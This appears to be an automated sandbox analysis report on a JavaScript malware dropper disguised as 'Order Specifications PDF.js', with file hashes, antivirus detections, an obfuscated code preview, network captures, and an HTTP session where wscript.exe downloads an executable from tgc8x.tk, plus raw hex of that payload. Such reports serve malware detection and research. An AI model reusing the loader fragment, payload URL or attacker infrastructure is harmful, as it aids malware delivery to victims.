                                                                                                      SHA-512:7168D9F2942F97FEA59F907A8F08176CCC794B52079605167E42095871BA6D4CF5546F2F4E3FE304D0CE800F47D671E9187204B27031FE0369F6E28ABD703180
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                      • Antivirus: ReversingLabs, Detection: 65%
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:very short file (no magic)
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1
                                                                                                      Entropy (8bit):0.0
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:U:U
                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                      Malicious:false
                                                                                                      Preview:1
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:very short file (no magic)
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1
                                                                                                      Entropy (8bit):0.0
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:U:U
                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                      Malicious:false
                                                                                                      Preview:1
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):613184
                                                                                                      Entropy (8bit):7.954016806295198
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:AcmcUFUmv2r+ea8u3gNT/dc8uOJ5psUME+hWk+y5Ci/Vr:AEUir3bN/d0ov+hbzNtr
                                                                                                      MD5:5ED905205AEB85AF64B2FF567A8CF838
                                                                                                      SHA1:8C8F1A28C100CCB9192DC496B61B978802907045
                                                                                                      SHA-256:1F67C6E30CA78B6DB87A70C44E71B19D20778913C9226E94F8AF74D8538BBB35
                                                                                                      SHA-512:7168D9F2942F97FEA59F907A8F08176CCC794B52079605167E42095871BA6D4CF5546F2F4E3FE304D0CE800F47D671E9187204B27031FE0369F6E28ABD703180
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                      • Antivirus: ReversingLabs, Detection: 65%
                                                                                                      File type:ASCII text, with very long lines (9438), with no line terminators
                                                                                                      Entropy (8bit):5.462386477884943
                                                                                                      TrID:
                                                                                                        File name:Order Specifications PDF.js
                                                                                                        File size:9438
                                                                                                        MD5:2f2dd87407ef0c27a76906745df56ec0
                                                                                                        SHA1:cec4a6dd3d0fa67524e93b1f8906ff5c15bf7f22
                                                                                                        SHA256:c074cae77f4adf2af92380ce03345d6abaf16ea5442690f18574429ce2538958
                                                                                                        SHA512:fe87d253a7f45e900ce6f2b86969b1c59c08d1bcaccd124fe4680fd5745652e1d08a9c042fbb7d4aee6b876ce517b89d34df4a49db8c3b2ecbd96955132c1709
                                                                                                        SSDEEP:192:yh9hiKdKb+uMl1jK3LUGnsYP9jdv/0yzGtFcYOrKGLzYMhIduxznM+bHRHILRES:ycSKbuDjALfP1dv/0V2YOrKUsMWdyznE
                                                                                                        TLSH:CB12C46065D0A40203D31FA27B3EA0EAC96E5AAF3E775CCFA406BDD45D58912CED1B34
                                                                                                        File Content Preview:function _0x5099(_0x304024,_0x5125dd){var _0x3974d=_0x3974();return _0x5099=function(_0xe99d3f,_0x318392){_0xe99d3f=_0xe99d3f-0xc8;var _0x59ecb7=_0x3974d[_0xe99d3f];if(_0x5099['GLbovs']===undefined){var _0x12b176=function(_0x5c0ef3){var _0x14b3e9='abcdefg
                                                                                                        Icon Hash:e8d69ece968a9ec4
                                                                                                        Timestamp:11/03/22-23:35:55.641128
                                                                                                        Protocol:UDP
                                                                                                        SID:2012811
                                                                                                        Message:ET DNS Query to a .tk domain - Likely Hostile
                                                                                                        Source Port:58595
                                                                                                        Dest Port:53
                                                                                                        Source IP:192.168.2.6
                                                                                                        Dest IP:8.8.8.8
                                                                                                        Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                                                        Nov 3, 2022 23:35:57.784742117 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.784826994 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.784848928 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.784920931 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.784946918 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.785048962 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.785060883 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.785088062 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.785132885 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.785147905 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.785182953 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.785258055 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.785289049 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.785361052 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.785399914 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.785492897 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.785509109 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.785599947 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.785628080 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.785706997 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.785732985 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.785897970 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.785901070 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.785923004 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.786016941 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.786067009 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.786087990 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.786104918 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.786118984 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.786134005 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.786139965 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.786180019 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.786187887 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.786206007 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.786257029 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.786278009 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.786304951 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.786390066 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.786407948 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.786494970 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.786514997 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.786619902 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.786662102 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.786736012 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.786765099 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.786870003 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.786904097 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.786936045 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.786997080 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.787010908 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.787028074 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.787045956 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.787085056 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.787127972 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.787156105 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.787236929 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.787261963 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.787343025 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.787369013 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.787445068 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.787468910 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.787547112 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.787607908 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.787682056 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.787698984 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.787750006 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.787798882 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.787851095 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.801227093 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.801275015 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.801289082 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.802061081 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:36:13.526469946 CET497112404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:36:16.551876068 CET497112404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:36:22.552428007 CET497112404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:36:35.572195053 CET497122404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:36:38.741400957 CET497122404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:36:44.757457972 CET497122404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:36:57.868833065 CET497132404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:37:00.883827925 CET497132404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:37:06.884363890 CET497132404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:37:19.902163982 CET497142404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:37:22.960484028 CET497142404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:37:29.061022043 CET497142404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:37:42.178406954 CET497152404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:37:45.192643881 CET497152404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:37:51.193121910 CET497152404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:38:04.496992111 CET497162404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:38:07.491359949 CET497162404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:38:13.491866112 CET497162404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:38:26.520153046 CET497172404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:38:29.665158033 CET497172404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:38:35.665662050 CET497172404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:38:48.683542013 CET497182404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:38:51.698323965 CET497182404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:38:57.699038982 CET497182404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:39:10.716201067 CET497192404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:39:13.731376886 CET497192404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:39:19.732033014 CET497192404192.168.2.651.75.209.245
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 3, 2022 23:35:55.641128063 CET | 58595 | 53 | 192.168.2.6 | 8.8.8.8
Nov 3, 2022 23:35:55.675801992 CET | 53 | 58595 | 8.8.8.8 | 192.168.2.6

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 3, 2022 23:35:55.641128063 CET | 192.168.2.6 | 8.8.8.8 | 0x1f1f | Standard query (0) | tgc8x.tk | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 3, 2022 23:35:55.675801992 CET | 8.8.8.8 | 192.168.2.6 | 0x1f1f | No error (0) | tgc8x.tk |  | 50.115.174.192 | A (IP address) | IN (0x0001) | false
                                                                                                        • tgc8x.tk
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49710 | 50.115.174.192 | 443 | C:\Windows\System32\wscript.exe

Timestamp | kBytes transferred | Direction | Data
2022-11-03 22:35:56 UTC | 0 | OUT | GET /tt/VNZVNCXKKJSF.exe HTTP/1.1
                                                                                                        Accept: */*
                                                                                                        Accept-Language: en-us
                                                                                                        UA-CPU: AMD64
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                        Host: tgc8x.tk
                                                                                                        Connection: Keep-Alive
2022-11-03 22:35:56 UTC | 0 | IN | HTTP/1.1 200 OK
                                                                                                        Date: Thu, 03 Nov 2022 22:35:55 GMT
                                                                                                        Server: Apache
                                                                                                        Last-Modified: Thu, 03 Nov 2022 03:51:27 GMT
                                                                                                        Accept-Ranges: bytes
                                                                                                        Content-Length: 613184
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-msdownload
                                                                                                        Data Ascii: CMUMp9Q5u|%J[`q~?>J)at\h9M@@4K}Y\1e}uGsB,xgn5,v[I~v &5?O<LpDWn$.B{L/X[q8oV+(]2!"'Y>E3]'/-
                                                                                                        2022-11-03 22:35:57 UTC78INData Raw: 53 10 d0 ee 5e 07 59 b5 b8 99 36 61 70 07 c4 42 c0 e8 65 52 1b 48 06 83 bf 4f 9e c6 1c ed ef 12 01 18 57 2f fd 77 d5 9b e9 74 8c d7 b7 c4 58 f8 9d e8 a2 fe fc ab f0 8d 55 f6 81 37 55 48 c1 43 aa 9d 90 94 cb a0 b8 ce 12 05 67 26 fc 73 6c 46 6d f0 fd 30 e2 e2 1e a7 27 bd 48 91 b3 fe 21 8a 28 28 74 bb 9d 85 d2 20 0c ef 5d ed be 7b ab 51 66 28 8e cd 24 4f 58 10 ac 92 41 c1 99 dd 62 8f 1d c3 d9 1f e8 09 7f 79 e3 24 43 8d 0b f6 08 60 ae 6d c4 93 49 0e 54 a9 6c 28 4c b3 21 da b9 d2 ea c3 a4 ee 1b 1c 66 90 4e 97 02 9d b4 17 43 92 ea 40 5c a6 9e 43 39 b4 7f cc 40 95 6e ba 23 1d 7c c6 22 73 df a7 d8 77 f1 4f b8 e4 8b 43 fa 4e 85 9b 8a 74 bc c2 d0 43 8f c6 55 9d c7 bf a3 29 66 d8 f6 a0 d8 13 cd d3 09 31 64 2c a9 03 e8 7d 63 ea f2 30 76 5e dd 27 60 2c c5 53 e6 de be
                                                                                                        Data Ascii: S^Y6apBeRHOW/wtXU7UHCg&slFm0'H!((t ]{Qf($OXAby$C`mITl(L!fNC@\C9@n#|"swOCNtCU)f1d,}c0v^'`,S
                                                                                                        2022-11-03 22:35:57 UTC86INData Raw: f5 27 31 98 45 0e cd e3 00 39 d3 b8 e8 a8 28 c9 82 1f 4d d0 cd 54 2e 6a 17 5e 2e 11 0d 07 df 7b 10 4e 21 df d4 db 6c e6 32 6a f7 68 a0 7c d3 18 5a 96 a4 84 bb b2 4f 2c 05 a6 2a 7e 5c db 83 04 24 b2 8b 5b 79 ca 37 bb 2e 5b 33 3f 52 30 6a 8b 55 9b 10 51 fd eb ca 77 9b d8 b7 a5 6c a9 6d 1f 36 4e 94 56 b8 ad 53 25 78 f4 00 cf c8 76 32 50 ba f5 69 7f c0 d1 a8 44 f6 f8 24 dc 93 1d 34 5f e1 85 6b 65 f7 76 42 91 36 e2 24 82 0c af ff a6 f9 09 5e 75 1c 5f f1 eb 0f 88 a0 4e cd be 9f 0d 08 f8 64 77 36 e6 bf 78 a9 ef 4a 8b 64 d8 82 11 75 9d 45 f4 5c 15 a5 1f 9e 83 6d 2c d8 db 0f 73 a0 f6 2d fc 80 51 3f 71 c7 64 e6 45 03 02 7f be 9c df 87 aa 23 e2 3c 83 80 9b d2 7c 63 aa 85 22 ee 58 c7 5f 19 ea aa 5a 3d fa 0c e3 12 32 7a 73 f9 4c b9 34 a7 19 47 57 43 98 1c 0f db 05 65
                                                                                                        Data Ascii: '1E9(MT.j^.{N!l2jh|ZO,*~\$[y7.[3?R0jUQwlm6NVS%xv2PiD$4_kevB6$^u_Ndw6xJduE\m,s-Q?qdE#<|c"X_Z=2zsL4GWCe
                                                                                                        2022-11-03 22:35:57 UTC94INData Raw: 45 1f 01 2b e7 d3 8b c6 8d 2a ac 14 70 44 e8 2b a2 11 4e f2 91 e7 58 26 b4 93 73 e8 1e 94 14 e5 2e a7 55 46 48 66 f7 be 5c d1 e4 59 f0 f2 20 91 1f 56 95 42 98 ab 2d 9c 7f 5c 7e 25 60 6a 29 0a 2c a6 eb 20 6c 09 58 be e5 64 71 04 32 88 cf 05 ca 72 aa 13 7c 5a 6e 82 b0 c0 fc 41 b9 8d 62 7b f0 6e 5b 96 d9 a4 b4 05 78 fa d6 bc 69 05 ed 33 02 7c 40 e1 11 0b be a0 c9 cc de fa 80 52 f2 a4 eb 36 91 19 e8 16 18 3b 0f 0b ae 75 6e 93 27 11 f9 0b 6a 15 84 78 d4 98 57 4b 54 57 16 5a b9 51 7f 9d 53 56 9d f2 84 ce 4c 7e 93 88 84 88 5e 65 f6 9c 6c 68 71 bc 6b c0 20 c5 57 8a e9 c8 0f 64 fd dd 88 d1 1d 77 03 86 a5 41 a6 74 12 57 d6 39 db c9 56 30 1b 3b d6 45 97 1e 5a eb 12 34 2f 23 b2 6e 45 ab 2e 98 c1 12 43 fb 95 72 51 34 f9 37 4d 09 fa 60 4c 20 32 d3 47 41 11 a5 e6 dd cf
                                                                                                        Data Ascii: E+*pD+NX&s.UFHf\Y VB-\~%`j), lXdq2r|ZnAb{n[xi3|@R6;un'jxWKTWZQSVL~^elhqk WdwAtW9V0;EZ4/#nE.CrQ47M`L 2GA
                                                                                                        2022-11-03 22:35:57 UTC102INData Raw: 7a 43 a4 de 0d 17 bb ce 03 d4 29 cd 2f 15 10 d8 73 27 a7 dd 54 6d 2a 5e 3a e4 a2 18 5b 94 11 01 a0 21 01 99 39 09 86 ba 20 54 41 b9 ae 51 97 69 b1 d5 4b a5 c5 20 b8 6c 46 54 0c 69 cb 70 5e ea a5 08 e6 62 92 fc fd 14 33 ac 90 fb 7a bd 24 26 9f 60 95 bf b9 ab 7b 4c 41 23 7d 0a c6 1a c7 5a 8d 05 01 bd b1 24 95 0a 4f 48 d1 c3 38 6a 60 18 73 27 a7 dd 54 6d 2a 5e 54 24 89 41 32 79 c4 a8 e3 2e 05 e5 ca 75 0b b9 31 0b f6 6d c4 d7 68 dc 9f bf d5 4f 4c 8c ae 8e ed fb 50 6c 6e 96 f1 0c 2c 2c 07 23 dd 6c 83 5d ae e2 8e 05 4c de 6e 52 a3 4d 09 f2 52 c7 ae 1e b7 42 16 ca ef 23 b7 4e 06 5c 92 e6 40 b4 bd 08 76 9e cd cf fd 67 70 9b 52 12 15 14 81 7c 1b 3d 91 b7 7b 17 47 0a 8f fd af ca 3a be 83 b8 86 dc 73 63 48 2d 53 dd d1 6e 0e 1c 09 2d 1c 2d d5 7d 41 1f 05 75 bd be 59
                                                                                                        Data Ascii: zC)/s'Tm*^:[!9 TAQiK lFTip^b3z$&`{LA#}Z$OH8j`s'Tm*^T$A2y.u1mhOLPln,,#l]LnRMRB#N\@vgpR|={G:scH-Sn--}AuY
                                                                                                        2022-11-03 22:35:57 UTC109INData Raw: f9 7e e0 56 4b 91 a6 ec 96 4f db 69 bd fc 97 7b ef 3b e7 a6 44 c4 31 9e c7 86 1e 1c 09 78 9f da b4 ae ee dd 36 35 a4 da fc db dc 08 3b 92 7f 37 f4 76 65 cc ff 9d 2e 48 4f a0 6a f4 68 68 c2 9f 94 6b 70 4b 5d 69 cf 57 47 df 46 06 ad 91 97 8e 95 ce f7 93 23 5d 2f 10 8a 0a 5a 73 5e b2 c8 92 c1 c9 ed af 49 58 95 1a 42 ab 64 96 39 3d 04 08 09 a5 d4 22 fd 0c dd 9c e8 fe 06 e9 76 1c f9 d6 a4 34 9f 82 54 4a 6d b1 ba d4 f8 d3 24 be 0b 85 68 c3 9a fb c5 c2 21 ca 78 b9 83 ca 43 aa f5 08 48 88 df 1f b3 6e 35 d6 b0 95 14 00 19 02 04 95 f5 31 e1 44 f0 72 f6 47 e5 5d d9 19 c8 49 06 53 8e e6 37 7f a3 23 cb b7 72 36 2e 03 a5 4e 2e 8b d6 b3 c8 6c 98 30 51 a7 68 b4 f4 bb e9 f4 3b fe bd 22 e6 7b 52 fe 3d dd 9c 72 7c ba b6 b9 49 97 88 0d 62 90 db 0f 99 08 55 fd f1 35 ac a3 a1
                                                                                                        Data Ascii: ~VKOi{;D1x65;7ve.HOjhhkpK]iWGF#]/Zs^IXBd9="v4TJm$h!xCHn51DrG]IS7#r6.N.l0Qh;"{R=r|IbU5
                                                                                                        2022-11-03 22:35:57 UTC117INData Raw: 04 bd f6 de ce 02 64 c8 04 52 21 c6 91 14 15 0c 85 66 6e 4a 58 4a b6 e3 cc e0 14 4b 2e f6 44 3d bf 8f 9c 86 4c e3 83 4a 95 74 e4 4e 36 3f 92 b5 e7 00 c6 45 14 0b 9f c8 8f 39 ef a1 d4 c3 e2 77 93 59 27 89 64 20 69 9c 2f 7e 83 03 54 e5 f1 d3 75 18 55 71 4c dd d1 50 29 ad 3c b9 63 ed 65 f2 1a 60 44 8c a0 0e 6e 81 0d 58 fb 30 2b 2b f3 00 66 c5 a4 33 10 90 bb 8c 53 77 9e e3 da 7c d3 7d 26 cb bf c9 a0 51 6c f9 90 e4 63 8c d5 4a c2 47 9e 94 f8 ac ca 41 30 d3 6c b5 d6 db 56 c9 c2 f8 6b 5d 59 85 dd aa 07 50 1f 49 64 87 db 46 42 a5 1b 6d bf 28 e1 54 24 52 a3 1f e1 95 84 28 63 0d fc 7d 18 cb 0a b5 97 73 8f 59 b2 2d c0 e8 77 cc 2c f7 0e 05 1c 42 22 c2 75 f6 5b c5 2e d1 46 48 26 01 86 31 da 33 13 9a 11 cd df 96 04 c3 a5 4c e8 46 0c 79 b7 53 75 42 d3 5d af 13 76 21 5d
                                                                                                        Data Ascii: dR!fnJXJK.D=LJtN6?E9wY'd i/~TuUqLP)<ce`DnX0++f3Sw|}&QlcJGA0lVk]YPIdFBm(T$R(c}sY-w,B"u[.FH&13LFySuB]v!]
                                                                                                        2022-11-03 22:35:57 UTC125INData Raw: e0 70 b0 7c d5 2a 1a b7 6b 56 14 aa bf fa 29 a7 fd f5 4b 78 69 64 53 35 aa 27 44 ce 69 dd 9b c4 3a 4d 09 eb f6 49 ad 33 cb a1 0a 9c 7c 18 20 64 45 dc 4e 27 6e a0 4b e2 b7 eb e1 f7 08 dc 04 be 0b 16 55 30 13 45 1c 7b f9 15 77 78 ec c8 fb fe bb b2 4a c9 03 02 ce cb 0f 10 90 25 c2 7d 5b ee 5b 8f 31 db 01 44 2a 12 3e d1 14 53 b3 35 12 69 4f a3 39 88 53 77 ff 5c 18 00 06 e4 06 00 62 2c 10 64 57 47 a7 66 22 a4 bd b7 48 50 02 12 81 1d 2e 04 7c 5f 79 8c 85 34 3d ad 26 fe 6e 94 67 12 26 4e 5c 58 87 0c 59 a6 a9 75 86 73 9a 4b ab b2 92 08 d3 34 e1 a9 c0 1e 5a c7 48 d5 c2 f6 08 8b 80 2f 0f f4 f2 7f c3 25 30 9a b6 a8 0d f4 f0 dd a4 52 84 73 fd 4f c1 85 5b 83 21 5b 8d 99 d2 79 05 e0 dc 9f 66 12 25 a5 59 76 28 dd 71 f7 8d de 35 b7 c7 93 6f e4 86 93 37 91 fa b8 25 b7 0e
                                                                                                        Data Ascii: p|*kV)KxidS5'Di:MI3| dEN'nKU0E{wxJ%}[[1D*>S5iO9Sw\b,dWGf"HP.|_y4=&ng&N\XYusK4ZH/%0RsO[![yf%Yv(q5o7%
                                                                                                        2022-11-03 22:35:57 UTC133INData Raw: c6 6c 2b 02 55 c8 8b fe f4 8b ae 7d 51 bd af 7c 29 b7 eb 78 0d 36 9b d5 7a 88 b9 8c ac 7d a8 b1 31 62 fd 53 ea 82 61 3c 1e eb 99 79 1d 22 7e b1 98 fb fd 80 d5 c1 6f c0 5c a6 94 6b 8e f6 ff ee 2e ed 2a 00 b4 b9 27 27 e4 97 ad 97 48 25 cb f8 89 54 ae 53 07 47 3b 01 b4 1d 3d 97 2b 95 2d 58 fb 6d 25 e6 60 ed 16 cf 4d 2b b9 5d ac 87 d2 1e a0 d2 dd c2 62 18 7d e8 11 aa 4f 2f 70 2e b3 d2 05 ef 08 f4 11 81 bc 46 0d 3c ec 5f 20 d9 bb 12 39 77 8d a6 f5 2e 86 83 39 77 0d 83 3d 79 33 4c 30 bb 8d e5 64 84 66 6e ce bc f2 2a 0e 0e 55 ec d6 47 c9 75 cb 5c aa 1a cc 3e 55 48 ec b0 6f f8 14 4c c8 94 de 92 28 8e fb dd e5 30 5c 72 07 9d 56 bd 76 72 a4 26 f9 12 26 ed 4e 26 50 1e 64 3b ae ec 3e a1 bc df 3a cd 3f 4b 4f f0 5a c9 3e d0 49 be 70 a4 c2 41 3e 2c d3 02 bb 56 48 bf ac
                                                                                                        Data Ascii: l+U}Q|)x6z}1bSa<y"~o\k.*''H%TSG;=+-Xm%`M+]b}O/p.F<_ 9w.9w=y3L0dfn*UGu\>UHoL(0\rVvr&&N&Pd;>:?KOZ>IpA>,VH
                                                                                                        2022-11-03 22:35:57 UTC141INData Raw: f2 85 30 dd a0 69 60 1f 28 c5 9e 7f ff 2a b2 fc 39 65 81 66 8f 6f 4b d2 f3 eb 4f 1d 42 5f 5a e2 57 a5 0f 80 d6 ee 19 85 33 01 65 70 49 54 14 46 45 14 f0 73 46 1e 61 45 3d 61 f4 a5 b9 62 c2 28 dc bc 9a 37 28 55 76 25 a0 d1 0c 18 55 9a 05 04 a0 06 18 85 86 54 5a 3a 05 70 3f 3f 1a dc 31 85 a8 73 ed 26 cc dc 05 06 88 bb 0c f4 94 36 a6 eb 2c e1 2d 73 9b 06 e2 bf d4 61 89 51 cc 24 2d a8 0b cd 94 95 f3 8a ea 6d 63 c2 d1 05 5c e8 59 15 c2 3f 80 78 56 65 6d 28 4e 3a 94 7b 3d 94 0e bf d7 50 4b 28 6e c4 ed 30 b7 29 f9 24 1b 1f 1b b4 5c 06 c8 7d af 46 19 e1 3e ec 11 1f 1d 68 73 0e d1 38 08 a2 21 4c bb ff a1 6b 5e 26 e9 fa 58 3f 91 f0 52 6b c3 1e ce 27 1e 30 e9 bc c2 0c 33 18 90 da bb b4 ef c7 cc d6 ba b0 ff 4c e0 eb 5c 60 5d ec 4c d1 0c 3a 1c 97 6e 60 fa db cd c4 fc
